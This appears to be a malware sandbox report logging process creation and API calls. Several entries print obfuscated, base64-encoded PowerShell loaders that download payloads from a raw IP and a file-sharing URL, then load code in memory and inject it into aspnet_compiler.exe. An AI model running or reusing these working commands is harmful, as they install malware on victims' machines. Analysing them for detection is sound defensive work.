              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernardaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0042C4A3 NtClose,27_2_0042C4A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,27_2_00A707AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F9F0 NtClose,LdrInitializeThunk,27_2_00A6F9F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,27_2_00A6FAE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,27_2_00A6FB68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,27_2_00A6FDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A700C4 NtCreateFile,27_2_00A700C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70060 NtQuerySection,27_2_00A70060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70078 NtResumeThread,27_2_00A70078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70048 NtProtectVirtualMemory,27_2_00A70048
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A701D4 NtSetValueKey,27_2_00A701D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7010C NtOpenDirectoryObject,27_2_00A7010C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A70C40 NtGetContextThread,27_2_00A70C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A710D0 NtOpenProcessToken,27_2_00A710D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71148 NtOpenThread,27_2_00A71148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F8CC NtWaitForSingleObject,27_2_00A6F8CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71930 NtSetContextThread,27_2_00A71930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F938 NtWriteFile,27_2_00A6F938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6F900 NtReadFile,27_2_00A6F900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAB8 NtQueryValueKey,27_2_00A6FAB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FAD0 NtAllocateVirtualMemory,27_2_00A6FAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FA20 NtQueryInformationFile,27_2_00A6FA20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FA50 NtEnumerateValueKey,27_2_00A6FA50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FBB8 NtQueryInformationToken,27_2_00A6FBB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FBE8 NtQueryVirtualMemory,27_2_00A6FBE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FB50 NtCreateKey,27_2_00A6FB50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC90 NtUnmapViewOfSection,27_2_00A6FC90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC30 NtOpenProcess,27_2_00A6FC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC60 NtMapViewOfSection,27_2_00A6FC60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FC48 NtSetInformationFile,27_2_00A6FC48
